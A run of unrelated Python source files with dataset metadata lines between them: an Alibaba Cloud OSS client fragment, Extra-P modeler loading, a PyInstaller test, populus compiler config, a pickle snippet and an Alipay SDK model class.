self.put_object_from_file_given_pos(bucket, tmp_object, filename, offset, partsize , content_type, tmp_headers, tmp_params) return res def upload_large_file(self, bucket, object, filename, thread_num=10, max_part_num=1000, headers=None): ''' Upload large file, the 
content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response ''' #split the large file into 1000 parts or many parts #get part_msg_list if not headers: headers = {} if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num retry_times = self.retry_times while(retry_times >= 0): try: threadpool = [] for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = PutObjectGroupWorker(oss, bucket, filename, part_msg_list[begin:end], self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times = retry_times -1 if -1 >= retry_times: print "after retry %s, failed, upload large file failed!" 
% retry_times return #get xml string that contains msg of object group object_group_msg_xml = create_object_group_msg_xml(part_msg_list) content_type = get_content_type_by_filename(filename) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') if not headers.has_key('Content-Type'): headers['Content-Type'] = content_type return self.post_object_group(bucket, object, object_group_msg_xml, headers) def copy_object(self, source_bucket, source_object, target_bucket, target_object, headers=None): ''' Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if isinstance(source_object, unicode): source_object = source_object.encode('utf-8') source_object = urllib.quote(source_object) headers['x-oss-copy-source'] = "/%s/%s" % (source_bucket, source_object) method = 'PUT' body = '' params = {} return self.http_request(method, target_bucket, target_object, headers, body, params) def init_multi_upload(self, bucket, object, headers=None, params=None): ''' Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'POST' body = '' params['uploads'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_all_parts(self, bucket, object, upload_id, max_parts=None, part_number_marker=None): ''' List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response ''' method = 'GET' headers = {} body = '' params = {} params['uploadId'] = upload_id if max_parts: params['max-parts'] = max_parts if part_number_marker: 
params['part-number-marker'] = part_number_marker return self.http_request(method, bucket, object, headers, body, params) def get_all_multipart_uploads(self, bucket, delimiter=None, max_uploads=None, key_marker=None, prefix=None, upload_id_marker=None, headers=None): ''' List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['uploads'] = '' if delimiter: params['delimiter'] = delimiter if max_uploads: params['max-uploads'] = max_uploads if key_marker: params['key-marker'] = key_marker if prefix: params['prefix'] = prefix if upload_id_marker: params['upload-id-marker'] = upload_id_marker return self.http_request(method, bucket, object, headers, body, params) def upload_part(self, bucket, object, filename, upload_id, part_number, headers=None, params=None): ''' Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file(bucket, object, filename, content_type, headers, params) def upload_part_from_string(self, bucket, object, data, upload_id, part_number, headers=None, params=None): ''' Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response 
''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' fp = StringIO.StringIO(data) return self.put_object_from_fp(bucket, object, fp, content_type, headers, params) def complete_upload(self, bucket, object, upload_id, part_msg_xml, headers=None, params=None): ''' Finish multiupload and merge all the parts in part_msg_xml as a object. :type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' body = part_msg_xml headers['Content-Length'] = str(len(body)) params['uploadId'] = upload_id if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type return self.http_request(method, bucket, object, headers, body, params) def cancel_upload(self, bucket, object, upload_id, headers=None, params=None): ''' Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'DELETE' if isinstance(upload_id, unicode): upload_id = upload_id.encode('utf-8') params['uploadId'] = upload_id body = '' return self.http_request(method, bucket, object, headers, body, params) def multi_upload_file(self, bucket, object, filename, upload_id='', thread_num=10, max_part_num=10000, headers=None, params=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. 
:type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response ''' #get init upload_id if not upload_id: res = self.init_multi_upload(bucket, object, headers, params) body = res.read() if res.status == 200: h = GetInitUploadIdXml(body) upload_id = h.upload_id else: err = ErrorXml(body) raise Exception("%s, %s" %(res.status, err.msg)) if not upload_id: raise Exception("-1, Cannot get upload id.") #split the large file into 1000 parts or many parts #get part_msg_list if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) logger = getlogger(self.debug) logger.info("bucket:%s, object:%s, upload_id is: %s, split_number:%d" % (bucket, object, upload_id, len(part_msg_list))) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num #list part to get a map upload_retry_times = self.retry_times while(upload_retry_times >= 0): uploaded_part_map = {} oss = OssAPI(self.host, self.access_id, self.secret_access_key) uploaded_part_map = get_part_map(oss, bucket, object, upload_id) retry_times = self.retry_times while(retry_times >= 0): threadpool = [] try: for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = UploadPartWorker(oss, bucket, object, upload_id, filename, part_msg_list[begin:end], uploaded_part_map, self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times -= 1 if -1 >= retry_times: raise Exception("-2, after retry %s, failed, multi upload part 
failed! upload_id:%s" % (self.retry_times, upload_id)) #get xml string that contains msg of part part_msg_xml = create_part_xml(part_msg_list) #complete upload res = self.complete_upload(bucket, object, upload_id, part_msg_xml, headers, params) if res.status == 200: break upload_retry_times -= 1 if upload_retry_times < 0: raise Exception("-3, after retry %s, failed, multi upload file failed! upload_id:%s" % (self.retry_times, upload_id)) return res def delete_objects(self, bucket, object_list=None, headers=None, params=None): ''' Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) return self.batch_delete_object(bucket, object_list_xml, headers, params) def batch_delete_object(self, bucket, object_list_xml, headers=None, params=None): ''' Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' object = '' body = object_list_xml headers['Content-Length'] = str(len(body)) params['delete'] = '' base64md5 = base64.encodestring(md5.new(body).digest()) if base64md5[-1] == '\n': base64md5 = base64md5[0:-1] headers['Content-MD5'] = base64md5 return self.http_request(method, bucket, object, headers, body, params) def list_objects(self, bucket, prefix=''): ''' :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix ''' get_instance = GetAllObjects() marker_input = '' object_list = [] oss = OssAPI(self.host, self.access_id, self.secret_access_key) (object_list, 
marker_output) = get_instance.get_object_in_bucket(oss, bucket, marker_input, prefix) return object_list def batch_delete_objects(self, bucket, object_list=None): ''' :type bucket: string :param: :type object_list: object name list :param: Returns: True or False ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) try: res = self.batch_delete_object(bucket, object_list_xml) if res.status / 100 == 2: return True except: pass return False def get_object_info(self, bucket, object, headers=None, params=None): ''' Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'GET' body = '' params['objectInfo'] = '' return self.http_request(method, bucket, object, headers, body, params)
en
0.60478
#!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. A simple OSS API Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. 
Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. :type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response List all buckets of user List all buckets of user type headers: dict :param Returns: HTTP Response Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response Get Location of bucket List object that in bucket List object that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Create bucket Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response Create bucket :type bucket: string 
:param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response Delete bucket :type bucket: string :param Returns: HTTP Response Put object into bucket, the content of object is from input_content Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response # TODO: get object with flow Delete object :type bucket: string :param :type object: 
string :param :type headers: dict :param: HTTP header Returns: HTTP Response Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response Get object group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. 
:type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response #split the large file into 1000 parts or many parts #get part_msg_list #make sure all the parts are put into same bucket #get xml string that contains msg of object group Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Finish multiupload and merge all the parts in part_msg_xml as a object. 
:type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response #get init upload_id #split the large file into 1000 parts or many parts #get part_msg_list #make sure all the parts are put into same bucket #list part to get a map #get xml string that contains msg of part #complete upload Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix :type bucket: string :param: :type object_list: object name list :param: Returns: True or False Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: 
dict :param: the parameters that put in the url address as query string Returns: HTTP Response
1.290394
1
extrap/modelers/loader.py
Shadowjockey/extrap
0
6629023
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details. import inspect import pkgutil from typing import Mapping, Type, MutableMapping from marshmallow import fields, validate from extrap.util.serialization_schema import NumberField from .abstract_modeler import AbstractModeler, ModelerSchema from .modeler_options import ModelerOption, modeler_options def load_modelers(path, pkg_name) -> MutableMapping[str, Type[AbstractModeler]]: def is_modeler(x): return inspect.isclass(x) \ and issubclass(x, AbstractModeler) \ and not inspect.isabstract(x) modelers = {} for importer, modname, is_pkg in pkgutil.walk_packages(path=path, prefix=pkg_name + '.', onerror=lambda x: None): module = importer.find_module(modname).load_module(modname) for name, clazz in inspect.getmembers(module, is_modeler): name = clazz.NAME modelers[name] = clazz create_schema(clazz) return modelers def _determine_field(option: ModelerOption): if option.range: if isinstance(option.range, range): if range.step == 1: validation = validate.Range(option.range.start, option.range.stop, max_inclusive=False) else: validation = validate.OneOf(option.range) elif isinstance(option.range, Mapping): validation = validate.OneOf(list(option.range.values()), labels=list(option.range.keys())) else: validation = validate.OneOf(option.range) else: validation = None kwargs = { 'validation': validation, 'default': option.value, 'required': False, 'allow_none': True } if option.type is int: return fields.Int(**kwargs) elif option.type is float: return NumberField(**kwargs) elif option.type is bool: return fields.Bool(**kwargs) elif option.type is str: return fields.Str(**kwargs) else: return fields.Function(serialize=str, deserialize=option.type, **kwargs) def create_schema(cls): 
attribute_fields = {'create_object': lambda self: cls()} for o in modeler_options.iter(cls): attribute_fields[o.field] = _determine_field(o) cls_schema = type(cls.__name__ + 'Schema', (ModelerSchema,), attribute_fields) globals()[cls_schema.__name__] = cls_schema
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details. import inspect import pkgutil from typing import Mapping, Type, MutableMapping from marshmallow import fields, validate from extrap.util.serialization_schema import NumberField from .abstract_modeler import AbstractModeler, ModelerSchema from .modeler_options import ModelerOption, modeler_options def load_modelers(path, pkg_name) -> MutableMapping[str, Type[AbstractModeler]]: def is_modeler(x): return inspect.isclass(x) \ and issubclass(x, AbstractModeler) \ and not inspect.isabstract(x) modelers = {} for importer, modname, is_pkg in pkgutil.walk_packages(path=path, prefix=pkg_name + '.', onerror=lambda x: None): module = importer.find_module(modname).load_module(modname) for name, clazz in inspect.getmembers(module, is_modeler): name = clazz.NAME modelers[name] = clazz create_schema(clazz) return modelers def _determine_field(option: ModelerOption): if option.range: if isinstance(option.range, range): if range.step == 1: validation = validate.Range(option.range.start, option.range.stop, max_inclusive=False) else: validation = validate.OneOf(option.range) elif isinstance(option.range, Mapping): validation = validate.OneOf(list(option.range.values()), labels=list(option.range.keys())) else: validation = validate.OneOf(option.range) else: validation = None kwargs = { 'validation': validation, 'default': option.value, 'required': False, 'allow_none': True } if option.type is int: return fields.Int(**kwargs) elif option.type is float: return NumberField(**kwargs) elif option.type is bool: return fields.Bool(**kwargs) elif option.type is str: return fields.Str(**kwargs) else: return fields.Function(serialize=str, deserialize=option.type, **kwargs) def create_schema(cls): 
attribute_fields = {'create_object': lambda self: cls()} for o in modeler_options.iter(cls): attribute_fields[o.field] = _determine_field(o) cls_schema = type(cls.__name__ + 'Schema', (ModelerSchema,), attribute_fields) globals()[cls_schema.__name__] = cls_schema
en
0.838465
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details.
1.890008
2
SWIM-Executables/Windows/pyinstaller-2.0 for windows/buildtests/import/test_onefile_c_extension.py
alexsigaras/SWIM
47
6629024
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so import os import sys from simplejson import _speedups modpath = os.path.join(sys.prefix, 'simplejson._speedups') frozen_modpath = os.path.splitext(_speedups.__file__)[0] print('Module path expected: ' + modpath) print('Module path current: ' + frozen_modpath) if not frozen_modpath == modpath: raise SystemExit('Python C-extension file name is not correct.')
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so import os import sys from simplejson import _speedups modpath = os.path.join(sys.prefix, 'simplejson._speedups') frozen_modpath = os.path.splitext(_speedups.__file__)[0] print('Module path expected: ' + modpath) print('Module path current: ' + frozen_modpath) if not frozen_modpath == modpath: raise SystemExit('Python C-extension file name is not correct.')
en
0.820691
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so
2.325927
2
db/__init__.py
TiMed-dev/TIMed-backend
0
6629025
# -*- coding: utf-8 -*- """ db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details. """ import os import sys import dbconn __version__ = '1.0.0' __all__ = ["dbconn"] sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
# -*- coding: utf-8 -*- """ db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details. """ import os import sys import dbconn __version__ = '1.0.0' __all__ = ["dbconn"] sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
en
0.752614
# -*- coding: utf-8 -*- db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details.
2.011058
2
populus/config/compiler.py
mandarvaze/populus
1
6629026
<gh_stars>1-10 from __future__ import absolute_import from eth_utils import ( is_string, ) from populus.utils.module_loading import ( import_string, ) from populus.config.helpers import ( ClassImportPath, ) from .base import Config BACKEND_IDENTIFIER_MAP = { 'solc:combined-json': 'populus.compilation.backends.solc.SolcCombinedJSONBackend', 'solc:standard-json': 'populus.compilation.backends.solc.SolcStandardJSONBackend', } UNSUPPORTED_BACKEND_IDENTIFIER_MSG = ( "Unsupported type. Must be either a backend class, a dot " "separated python path to a backend class, or one of `ipc` or " "`rpc`" ) class CompilerConfig(Config): backend_class = ClassImportPath('class') def set_backend_class(self, backend_identifier): if isinstance(backend_identifier, type): self.backend_class = backend_identifier elif is_string(backend_identifier): if backend_identifier.lower() in BACKEND_IDENTIFIER_MAP: self.backend_class = BACKEND_IDENTIFIER_MAP[backend_identifier.lower()] else: try: import_string(backend_identifier) except ImportError: raise ValueError( UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier) ) else: self.backend_class = backend_identifier else: raise ValueError(UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier)) @property def backend(self): return self.backend_class(self.backend_settings) @property def backend_settings(self): return self.get('settings', {})
from __future__ import absolute_import from eth_utils import ( is_string, ) from populus.utils.module_loading import ( import_string, ) from populus.config.helpers import ( ClassImportPath, ) from .base import Config BACKEND_IDENTIFIER_MAP = { 'solc:combined-json': 'populus.compilation.backends.solc.SolcCombinedJSONBackend', 'solc:standard-json': 'populus.compilation.backends.solc.SolcStandardJSONBackend', } UNSUPPORTED_BACKEND_IDENTIFIER_MSG = ( "Unsupported type. Must be either a backend class, a dot " "separated python path to a backend class, or one of `ipc` or " "`rpc`" ) class CompilerConfig(Config): backend_class = ClassImportPath('class') def set_backend_class(self, backend_identifier): if isinstance(backend_identifier, type): self.backend_class = backend_identifier elif is_string(backend_identifier): if backend_identifier.lower() in BACKEND_IDENTIFIER_MAP: self.backend_class = BACKEND_IDENTIFIER_MAP[backend_identifier.lower()] else: try: import_string(backend_identifier) except ImportError: raise ValueError( UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier) ) else: self.backend_class = backend_identifier else: raise ValueError(UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier)) @property def backend(self): return self.backend_class(self.backend_settings) @property def backend_settings(self): return self.get('settings', {})
none
1
2.112915
2
pickle_save_load.py
DeepsMoseli/LSTMGAN-for-melody-generation
12
6629027
<reponame>DeepsMoseli/LSTMGAN-for-melody-generation import pickle # create dictionary containing all your data data = {'stim': np.array([1, 2, 3]), 'response': np.array([6, 2, 0])} # save data in pickle format with open('my_data.pickle', 'wb') as f: pickle.dump(data, f) # open data from file with open('my_data.pickle', 'rb') as f: new_data_variable = pickle.load(f) #now the data will be in dictionary new_data_variable
import pickle # create dictionary containing all your data data = {'stim': np.array([1, 2, 3]), 'response': np.array([6, 2, 0])} # save data in pickle format with open('my_data.pickle', 'wb') as f: pickle.dump(data, f) # open data from file with open('my_data.pickle', 'rb') as f: new_data_variable = pickle.load(f) #now the data will be in dictionary new_data_variable
en
0.584995
# create dictionary containing all your data # save data in pickle format # open data from file #now the data will be in dictionary new_data_variable
3.020201
3
alipay/aop/api/domain/AlipayCommerceMedicalCardQueryModel.py
snowxmas/alipay-sdk-python-all
32
6629028
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AlipayCommerceMedicalCardQueryModel(object): def __init__(self): self._auth_code = None self._buyer_id = None self._card_org_no = None self._extend_params = None self._return_url = None self._scene = None @property def auth_code(self): return self._auth_code @auth_code.setter def auth_code(self, value): self._auth_code = value @property def buyer_id(self): return self._buyer_id @buyer_id.setter def buyer_id(self, value): self._buyer_id = value @property def card_org_no(self): return self._card_org_no @card_org_no.setter def card_org_no(self, value): self._card_org_no = value @property def extend_params(self): return self._extend_params @extend_params.setter def extend_params(self, value): self._extend_params = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def scene(self): return self._scene @scene.setter def scene(self, value): self._scene = value def to_alipay_dict(self): params = dict() if self.auth_code: if hasattr(self.auth_code, 'to_alipay_dict'): params['auth_code'] = self.auth_code.to_alipay_dict() else: params['auth_code'] = self.auth_code if self.buyer_id: if hasattr(self.buyer_id, 'to_alipay_dict'): params['buyer_id'] = self.buyer_id.to_alipay_dict() else: params['buyer_id'] = self.buyer_id if self.card_org_no: if hasattr(self.card_org_no, 'to_alipay_dict'): params['card_org_no'] = self.card_org_no.to_alipay_dict() else: params['card_org_no'] = self.card_org_no if self.extend_params: if hasattr(self.extend_params, 'to_alipay_dict'): params['extend_params'] = self.extend_params.to_alipay_dict() else: params['extend_params'] = self.extend_params if self.return_url: if hasattr(self.return_url, 'to_alipay_dict'): params['return_url'] = self.return_url.to_alipay_dict() else: params['return_url'] = self.return_url if self.scene: if 
hasattr(self.scene, 'to_alipay_dict'): params['scene'] = self.scene.to_alipay_dict() else: params['scene'] = self.scene return params @staticmethod def from_alipay_dict(d): if not d: return None o = AlipayCommerceMedicalCardQueryModel() if 'auth_code' in d: o.auth_code = d['auth_code'] if 'buyer_id' in d: o.buyer_id = d['buyer_id'] if 'card_org_no' in d: o.card_org_no = d['card_org_no'] if 'extend_params' in d: o.extend_params = d['extend_params'] if 'return_url' in d: o.return_url = d['return_url'] if 'scene' in d: o.scene = d['scene'] return o
